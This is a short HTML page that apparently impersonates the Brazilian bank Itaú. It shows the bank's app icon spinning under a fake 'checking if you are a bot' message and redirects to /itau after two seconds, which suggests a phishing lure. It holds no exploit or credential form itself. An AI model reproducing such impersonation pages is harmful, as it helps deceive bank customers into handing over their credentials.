<!DOCTYPE html>
<html>
<head>
    <title>Itau Seguro</title>
    <META http-equiv="refresh" content="2;/itau"></META>
    <link rel="shortcut icon" href="https://is1-ssl.mzstatic.com/image/thumb/Purple125/v4/e7/bc/42/e7bc42c0-4cc3-a199-2de7-e5ae41db9114/AppIcon-0-0-1x_U007emarketing-0-0-0-6-0-0-sRGB-0-0-0-GLES2_U002c0-512MB-85-220-0-0.png/230x0w.webp" />
</head>
<body>
<div class="tela">
    <div class="box">
        <h1 style="position: absolute; margin-top: -320px; font-size: 25px; color: white">VERIFICANDO SE A UM BOT</h1>
        <img class="img1" src="https://is1-ssl.mzstatic.com/image/thumb/Purple125/v4/e7/bc/42/e7bc42c0-4cc3-a199-2de7-e5ae41db9114/AppIcon-0-0-1x_U007emarketing-0-0-0-6-0-0-sRGB-0-0-0-GLES2_U002c0-512MB-85-220-0-0.png/230x0w.webp">
        <h1 style="position: absolute; margin-top: 370px; font-family: arial; color: white">carregando...</h1>
    </div>
</div>
</body>
<style type="text/css">
    .img1 {
        width: 300px; 
        border-radius: 50%; 
        
        animation: spin 3.5s linear infinite;
    }   
    @keyframes spin {
        to {
            transform: rotate(360deg);
        }
    }
    .box {
        width: 400px;
        height: 400px;
        background-color: #184790;
        box-shadow: black 2px 2px 22px;
        border-radius: 20px;
        justify-content: center;
        align-items: center;
        display: flex;
    }
    .tela {
        background-color: #EAA523;
        width: 100vw;
        height: 100vh;
        justify-content: center;
        align-items: center;
        display: inline-flex;
    }
    body {
        margin: 0px;
        font-family: arial;
    }
</style>
</html>